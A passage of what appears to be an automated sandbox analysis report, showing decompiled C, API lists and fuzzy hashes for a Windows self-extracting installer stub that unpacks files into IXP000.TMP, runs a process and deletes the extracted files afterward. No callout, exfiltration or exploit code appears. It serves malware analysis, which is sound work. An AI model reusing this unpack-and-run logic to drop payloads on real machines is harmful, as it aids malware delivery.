				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				signed int _t35;
				intOrPtr _t39;
				struct HINSTANCE__* _t42;
				signed int _t44;
				int _t45;

				_t41 = __edx;
				_t8 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t8 ^ _t44;
				if( *0xf38958 != 0) {
					L6:
					_t10 = E00F35009();
					__eflags = _t10;
					if(_t10 == 0) {
						L3:
						_t11 = 0;
						L30:
						return E00F36C20(_t11, _t35, _v8 ^ _t44, _t41, _t42, _t43);
					}
					_t13 = E00F35467(); // executed
					__eflags = _t13;
					if(_t13 == 0) {
						goto L3;
					} else {
						_t43 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t41 = 0x105;
						_t38 =  &_v272;
						E00F364E7( &_v272, 0x105, "advapi32.dll");
						_t42 = LoadLibraryA( &_v272);
						__eflags = _t42;
						if(_t42 != 0) {
							_t35 = GetProcAddress(_t42, "DecryptFileA");
							__eflags = _t35;
							if(_t35 != 0) {
								_t43 = _t45;
								_t38 = _t35;
								 *0xf3a290("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								 *_t35(); // executed
								__eflags = _t45 - _t45;
								if(_t45 != _t45) {
									_t38 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t42);
						__eflags =  *0xf38944;
						if( *0xf38944 != 0) {
							L15:
							_t20 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
							__eflags = _t20;
							if(_t20 != 0) {
								__eflags =  *0xf3894c;
								if( *0xf3894c != 0) {
									L19:
									__eflags =  *0xf38c68 & 0x000000c0;
									if(( *0xf38c68 & 0x000000c0) != 0) {
										 *0xf39a7c =  *0xf39a7c & 0x00000000;
										__eflags =  *0xf39a7c;
									} else {
										_t39 =  *0xf39a80; // 0x3, executed
										_t25 = E00F323CE(_t39); // executed
										 *0xf39a7c = _t25;
									}
									_t21 =  *0xf38944; // 0x0
									__eflags = _t21;
									if(_t21 != 0) {
										L26:
										__eflags =  *0xf38958;
										if( *0xf38958 == 0) {
											__eflags = _t21;
											if(_t21 == 0) {
												E00F33FC9();
											}
										}
										_t11 = 1;
										__eflags = 1;
										goto L30;
									} else {
										__eflags =  *0xf39a70 - _t21; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t24 = E00F339F1(); // executed
										__eflags = _t24;
										if(_t24 == 0) {
											goto L3;
										}
										_t21 =  *0xf38944; // 0x0
										goto L26;
									}
								}
								_t26 = E00F33970(_t38, _t42);
								__eflags = _t26;
								if(_t26 == 0) {
									goto L3;
								}
								goto L19;
							}
							_t41 = 0x4bc;
							E00F34327(0, 0x4bc, _t20, _t20, 0x10, _t20);
							 *0xf39a88 = E00F3613C();
							goto L3;
						}
						__eflags =  *0xf39a70;
						if( *0xf39a70 != 0) {
							goto L15;
						}
						_t29 = E00F360D0(); // executed
						__eflags = _t29;
						if(_t29 == 0) {
							goto L3;
						}
						goto L15;
					}
				}
				if( *0xf38944 != 0) {
					L5:
					_t33 = E00F33884();
					__eflags = _t33;
					if(_t33 == 0) {
						goto L3;
					}
					goto L6;
				}
				if(E00F3508F() != 0) {
					__eflags =  *0xf38958;
					if( *0xf38958 != 0) {
						goto L6;
					}
					goto L5;
				}
				goto L3;
			}

0x00f32dae
0x00f32db9
0x00f32dc0
0x00f32dce
0x00f32dfc
0x00f32dfc
0x00f32e01
0x00f32e03
0x00f32de2
0x00f32de2
0x00f32f3d
0x00f32f4d
0x00f32f4d
0x00f32e05
0x00f32e0a
0x00f32e0c
0x00000000
0x00f32e0e
0x00f32e0e
0x00f32e1b
0x00f32e26
0x00f32e28
0x00f32e2e
0x00f32e40
0x00f32e42
0x00f32e44
0x00f32e52
0x00f32e54
0x00f32e56
0x00f32e58
0x00f32e5a
0x00f32e63
0x00f32e69
0x00f32e6b
0x00f32e6d
0x00f32e6f
0x00f32e74
0x00f32e74
0x00f32e6d
0x00f32e56
0x00f32e77
0x00f32e7d
0x00f32e84
0x00f32e9c
0x00f32ea1
0x00f32ea7
0x00f32ea9
0x00f32ecb
0x00f32ed2
0x00f32ee1
0x00f32ee1
0x00f32ee8
0x00f32efd
0x00f32efd
0x00f32eea
0x00f32eea
0x00f32ef1
0x00f32ef6
0x00f32ef6
0x00f32f04
0x00f32f09
0x00f32f0b
0x00f32f27
0x00f32f27
0x00f32f2f
0x00f32f31
0x00f32f33
0x00f32f35
0x00f32f35
0x00f32f33
0x00f32f3c
0x00f32f3c
0x00000000
0x00f32f0d
0x00f32f0d
0x00f32f13
0x00000000
0x00000000
0x00f32f15
0x00f32f1a
0x00f32f1c
0x00000000
0x00000000
0x00f32f22
0x00000000
0x00f32f22
0x00f32f0b
0x00f32ed4
0x00f32ed9
0x00f32edb
0x00000000
0x00000000
0x00000000
0x00f32edb
0x00f32eb0
0x00f32eb7
0x00f32ec1
0x00000000
0x00f32ec1
0x00f32e86
0x00f32e8d
0x00000000
0x00000000
0x00f32e8f
0x00f32e94
0x00f32e96
0x00000000
0x00000000
0x00000000
0x00f32e96
0x00f32e0c
0x00f32dd7
0x00f32df3
0x00f32df3
0x00f32df8
0x00f32dfa
0x00000000
0x00000000
0x00000000
0x00f32dfa
0x00f32de0
0x00f32de9
0x00f32df1
0x00000000
0x00000000
0x00000000
0x00f32df1
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00F32E1B
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F32E3A
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F32E4C
DecryptFileA.ADVAPI32 ref: 00F32E69
FreeLibrary.KERNEL32(00000000), ref: 00F32E77
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F32EA1

Part of subcall function 00F3508F: LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000,00F32DDE,00000000,00000001,00000000), ref: 00F350AB

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F32E5E, 00F32E9C
advapi32.dll, xrefs: 00F32E21
DecryptFileA, xrefs: 00F32E46

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-58291647
Opcode ID: 46b338cec24d543cea77b67c53894ff623b3fb10458dcd281e4ca9f37600e393
Instruction ID: 5e606972b2f1ad827c411d32709f44be594c4b7f7eb17c720a0ed2a9a9c02990
Opcode Fuzzy Hash: 46b338cec24d543cea77b67c53894ff623b3fb10458dcd281e4ca9f37600e393
Instruction Fuzzy Hash: F641B630E013099ADB60AB75DC4677A37A9AB55774F104529E841C2291EFBCCC81FA62

Uniqueness

Uniqueness Score: -1.00%

Function 00F3532F, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F3532F(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xf39224;
					_t42 = 0x104;
					E00F31485(0xf39224, 0x104);
					L14:
					_t13 = E00F3578F(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xf39a88 = 0;
							_t14 = 1;
							L24:
							return E00F36C20(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00F35849(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xf38940; // 0x0
						if(_t61 != 0) {
							 *0xf38940 = 0;
							RemoveDirectoryA(_t48);
						}
						L21:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xf39a88 = E00F3613C();
						goto L21;
					}
					 *0xf38940 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00F35253(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L21;
				}
				_push(__ecx);
				_t48 = 0xf39224;
				E00F3158C(0xf39224, 0x104, __ecx,  &_v268);
				if(( *0xf39a74 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00F364E7(_t48, 0x104, 0xf31111);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00F364E7(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00f3533a
0x00f35341
0x00f35349
0x00f3534c
0x00f353de
0x00f353e3
0x00f353ea
0x00f353ef
0x00f353f1
0x00f353fb
0x00f3540f
0x00f3540f
0x00f35414
0x00f35447
0x00f35447
0x00f3544d
0x00f3544f
0x00f3545f
0x00f3545f
0x00f35419
0x00f35420
0x00000000
0x00000000
0x00f35422
0x00f35428
0x00f3542b
0x00f35431
0x00f35431
0x00f35437
0x00f35437
0x00000000
0x00f35437
0x00f35407
0x00f35440
0x00000000
0x00f35440
0x00f35409
0x00000000
0x00f35409
0x00f35352
0x00f35358
0x00f3535f
0x00000000
0x00000000
0x00f35365
0x00f35373
0x00f3537c
0x00f35388
0x00f353ce
0x00f353d3
0x00f353d7
0x00000000
0x00f353d7
0x00f35391
0x00f3539e
0x00f353a0
0x00f353c0
0x00f353c5
0x00f353c9
0x00000000
0x00f353c9
0x00f353a2
0x00f353a3
0x00f353b9
0x00000000
0x00f353b9
0x00f353a5
0x00f353a6
0x00f353b2
0x00000000
0x00f353b2
0x00f353a9
0x00000000
0x00000000
0x00f353ab
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35391
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F353FF
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35431

Part of subcall function 00F35253: RemoveDirectoryA.KERNELBASE(?,?,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352B8
Part of subcall function 00F35253: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352BF
Part of subcall function 00F35253: GetTempFileNameA.KERNEL32(?,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352E0
Part of subcall function 00F35253: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352EE
Part of subcall function 00F35253: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F352F7

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F35345, 00F35349, 00F35373, 00F353DE, 00F353FE, 00F3542A
i386, xrefs: 00F353C0
alpha, xrefs: 00F353B2
mips, xrefs: 00F353B9
ppc, xrefs: 00F353AB

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-186922987
Opcode ID: 44dd4907c3339419ac88e5d64bbff9722193dcb4fcdc5b90f6df7937d2c6d7ec
Instruction ID: 2ffab74f21cbc230e4a451f4569d46a18ce1126572d71d9e745d8f1c1d2a4c1b
Opcode Fuzzy Hash: 44dd4907c3339419ac88e5d64bbff9722193dcb4fcdc5b90f6df7937d2c6d7ec
Instruction Fuzzy Hash: 8531F7B1B04B1867CB14EF65DC41ABE769BABC0FB0F54412AB442C3254DFB8CD42B652

Uniqueness

Uniqueness Score: -1.00%

Function 00F321E7, Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F321E7(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t61;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xf38000; // 0xfdaca2c3
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				_push(_t61);
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00F36C20(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00F31485( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00F314BD( &_v280, 0x104, _t61, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00F31485( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00F314BD( &_v276, 0x104, _t63,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80); // executed
							DeleteFileA( &_v280); // executed
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00F314BD( &_v276, 0x104, _t63,  &(_v596.cFileName));
								_t58 = 0x104;
								E00F364E7( &_v280, 0x104, 0xf31111);
								E00F321E7( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63);
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00f321ef
0x00f321f5
0x00f321fa
0x00f321fc
0x00f32205
0x00f32207
0x00f3220a
0x00f32322
0x00f32329
0x00f3232a
0x00f3232b
0x00f32336
0x00f32219
0x00f32228
0x00f32232
0x00f3223b
0x00f3224d
0x00f32253
0x00f32258
0x00000000
0x00000000
0x00000000
0x00000000
0x00f3225e
0x00f3225e
0x00f3225f
0x00f32268
0x00f32276
0x00f322d1
0x00f322da
0x00f322ec
0x00f322fa
0x00f32278
0x00f32286
0x00f322aa
0x00f322b4
0x00f322bd
0x00f322c9
0x00f322c9
0x00f32286
0x00f32306
0x00f3230c
0x00f32315
0x00f3231c
0x00000000
0x00f3231c

APIs

FindFirstFileA.KERNELBASE(?,00F3895A,00F311C4,00F3895A,00000000,?,?), ref: 00F3224D
lstrcmpA.KERNEL32(?,00F311C8), ref: 00F3227E
lstrcmpA.KERNEL32(?,00F311CC), ref: 00F32292
SetFileAttributesA.KERNELBASE(?,00000080,?), ref: 00F322EC
DeleteFileA.KERNELBASE(?), ref: 00F322FA
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F32306
FindClose.KERNEL32(00000000), ref: 00F32315
RemoveDirectoryA.KERNELBASE(00F3895A), ref: 00F3231C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 27b79212b68df3ffe80f9819c1540c758efd3f205721126ab8a4f905e6164016
Instruction ID: b836306064efd00120f5776ae24f12479c88cc8d127ef816f3d16a8fabe913ef
Opcode Fuzzy Hash: 27b79212b68df3ffe80f9819c1540c758efd3f205721126ab8a4f905e6164016
Instruction Fuzzy Hash: F63192716047449BC320EB64DC8DAEB73ADBBC4335F00492EB98586290EB389909E762

Uniqueness

Uniqueness Score: -1.00%

Function 00F33E45, Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00F33E45(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				CHAR* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00F36C20(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xf39a88 = E00F3613C();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E00F34327(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xf38948; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xf39a6c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xf39a6c = _t44;
						}
					}
				}
				E00F33F76(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xf39a74 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00f33e45
0x00f33e50
0x00f33e57
0x00f33e5e
0x00f33e60
0x00f33e61
0x00f33e66
0x00f33f60
0x00f33f70
0x00f33f70
0x00f33e72
0x00f33e73
0x00f33e74
0x00f33e75
0x00f33e89
0x00f33e91
0x00f33f20
0x00f33f3f
0x00f33f4e
0x00f33f57
0x00f33f5c
0x00f33f5c
0x00f33f5e
0x00f33f5e
0x00000000
0x00f33f5e
0x00f33e9f
0x00f33eb2
0x00f33eb8
0x00f33ebe
0x00f33ec4
0x00f33ec6
0x00f33ecd
0x00f33ed5
0x00f33edf
0x00f33ee1
0x00f33ee1
0x00f33edf
0x00f33ecd
0x00f33ee7
0x00f33ef2
0x00f33efe
0x00f33f0e
0x00000000
0x00f33f18
0x00000000
0x00f33f18

APIs

CreateProcessA.KERNELBASE ref: 00F33E89
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F33E9F
GetExitCodeProcess.KERNELBASE ref: 00F33EB2
CloseHandle.KERNEL32(?), ref: 00F33EF2
CloseHandle.KERNEL32(?), ref: 00F33EFE
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F33F32
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F33F3F

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 89f6d8b20d607d99889e6c9e5fc90e837b8426926622e26a8c561b4a74efbd2d
Instruction ID: 6f87216b1c3f413b31fd34aa4b9f1f37baa82089a922e1a050f714ff2d2da841
Opcode Fuzzy Hash: 89f6d8b20d607d99889e6c9e5fc90e837b8426926622e26a8c561b4a74efbd2d
Instruction Fuzzy Hash: D431D17194020CABEB24DF26DC48FABB77EEB80730F2041A9F506D2160CA758E45FB21

Uniqueness

Uniqueness Score: -1.00%

Function 00F32A7E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00F32A7E(struct HINSTANCE__* _a4, int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t18;
				signed char _t20;
				intOrPtr* _t22;
				void* _t23;
				void* _t25;
				intOrPtr _t33;

				_t4 = GetVersion();
				if(_t4 >= 0 && (_t4 & 0x000000ff) >= 6) {
					_t13 = GetModuleHandleW(L"Kernel32.dll");
					if(_t13 != 0) {
						_t22 = GetProcAddress(_t13, "HeapSetInformation");
						if(_t22 != 0) {
							_t18 = _t22;
							 *0xf3a290(0, 1, 0, 0);
							 *_t22();
							if(_t25 != _t25) {
								_t18 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t21 = _a12;
				_t19 = _a4;
				 *0xf39a88 = 0;
				if(E00F32B38(_a4, _a12, _t18) != 0) {
					_t9 = E00F32DAE(_t21); // executed
					_t23 = _t9; // executed
					E00F35165(0, _t19, _t22, _t23); // executed
					if(_t23 != 0) {
						_t33 =  *0xf3895a; // 0x0
						if(_t33 == 0) {
							_t20 =  *0xf39a6c; // 0x0
							if((_t20 & 0x00000001) != 0) {
								E00F31DC7(_t20, _t22, _t23);
							}
						}
					}
				}
				_t6 =  *0xf385c8; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xf39a88; // 0x0
				return _t7;
			}

0x00f32a86
0x00f32a90
0x00f32aa1
0x00f32aa9
0x00f32ab7
0x00f32abb
0x00f32abf
0x00f32ac6
0x00f32acc
0x00f32ad0
0x00f32ad2
0x00f32ad7
0x00f32ad7
0x00f32ad0
0x00f32abb
0x00f32aa9
0x00f32ad9
0x00f32add
0x00f32ae0
0x00f32aed
0x00f32aef
0x00f32af4
0x00f32af6
0x00f32afd
0x00f32aff
0x00f32b05
0x00f32b07
0x00f32b10
0x00f32b12
0x00f32b12
0x00f32b10
0x00f32b05
0x00f32afd
0x00f32b17
0x00f32b1e
0x00f32b21
0x00f32b21
0x00f32b27
0x00f32b30

APIs

GetVersion.KERNEL32(00000000,00000001,00000001,?,00F36B21,00F30000,00000000,00000001,0000000A), ref: 00F32A86
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F36B21,00F30000,00000000,00000001,0000000A), ref: 00F32AA1
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F32AB1
CloseHandle.KERNEL32(00000000,?,?,00F36B21,00F30000,00000000,00000001,0000000A), ref: 00F32B21

Strings

Kernel32.dll, xrefs: 00F32A9C
HeapSetInformation, xrefs: 00F32AAB

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 63fc3c8a38c9b8845692b9089661ccf1ecf63ee737754f01e32cd2e92abab6ec
Instruction ID: 2e4aebccb01c14f51372d67af6bb0b646d04458490168609de7c56fc7c68ca44
Opcode Fuzzy Hash: 63fc3c8a38c9b8845692b9089661ccf1ecf63ee737754f01e32cd2e92abab6ec
Instruction Fuzzy Hash: 8511C271B043095BDB606FA6AC98E6B7B5AEBC0774F080024F902C3250DE7CDC40B662

Uniqueness

Uniqueness Score: -1.00%

Function 00F35165, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64
libraryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F35165(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t15;
				void* _t21;
				void* _t29;
				void* _t30;
				CHAR** _t32;
				void* _t33;
				signed int _t34;

				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t9 ^ _t34;
				_push(__esi);
				_t32 =  *0xf39220; // 0x3429d00
				_push(__edi);
				while(1) {
					_t29 = _t32;
					if(_t32 == 0) {
						break;
					}
					if( *0xf38944 == 0 &&  *0xf39a70 == 0) {
						SetFileAttributesA( *_t32, 0x80); // executed
						DeleteFileA( *_t32); // executed
					}
					_t32 = _t32[1];
					LocalFree( *_t29);
					LocalFree(_t29);
				}
				_t15 =  *0xf38940; // 0x0
				_pop(_t30);
				_pop(_t33);
				if(_t15 != 0 &&  *0xf38944 == 0 &&  *0xf39a70 == 0) {
					_push(_t22);
					E00F3158C( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					if(( *0xf39a74 & 0x00000020) != 0) {
						E00F3654A( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00F321E7( &_v268);
					_t15 =  *0xf38940; // 0x0
				}
				if( *0xf39a80 != 1 && _t15 != 0) {
					_t15 = E00F31E1D(_t22); // executed
				}
				 *0xf38940 =  *0xf38940 & 0x00000000;
				return E00F36C20(_t15, _t21, _v8 ^ _t34, 0x104, _t30, _t33);
			}

0x00f35165
0x00f35165
0x00f35170
0x00f35177
0x00f3517a
0x00f3517b
0x00f35181
0x00f351bd
0x00f351bd
0x00f351c1
0x00000000
0x00000000
0x00f3518b
0x00f3519d
0x00f351a5
0x00f351a5
0x00f351ad
0x00f351b0
0x00f351b7
0x00f351b7
0x00f351c3
0x00f351c8
0x00f351c9
0x00f351cc
0x00f351e0
0x00f351f2
0x00f351fe
0x00f35206
0x00f35206
0x00f35210
0x00f35216
0x00f3521c
0x00f35221
0x00f35221
0x00f3522e
0x00f35234
0x00f35234
0x00f3523c
0x00f3524d

APIs

SetFileAttributesA.KERNELBASE(03429D00,00000080,00000000,00000000), ref: 00F3519D
LdrResolveDelayLoadedAPI.NTDLL(03429D00), ref: 00F351A5
LocalFree.KERNEL32(03429D00,00000000,00000000), ref: 00F351B0
LocalFree.KERNEL32(03429D00), ref: 00F351B7
SetCurrentDirectoryA.KERNELBASE(00F311CC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F35210

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F351E1

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLocal$AttributesCurrentDelayDirectoryFileLoadedResolve
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3787803824-2312194364
Opcode ID: bdc79259598a25e89a5b2868b33ae0173b78ccd222394303a7b8c749c69e0564
Instruction ID: 6dd35989ddd309896381f15d278300c28fdb653fcb2d56b233da813942eba00e
Opcode Fuzzy Hash: bdc79259598a25e89a5b2868b33ae0173b78ccd222394303a7b8c749c69e0564
Instruction Fuzzy Hash: FB216F31906608DBDB64AF50ED09B6A37A2FB84B75F040159E882531A0CFF89D85FB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F37360, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F37360() {

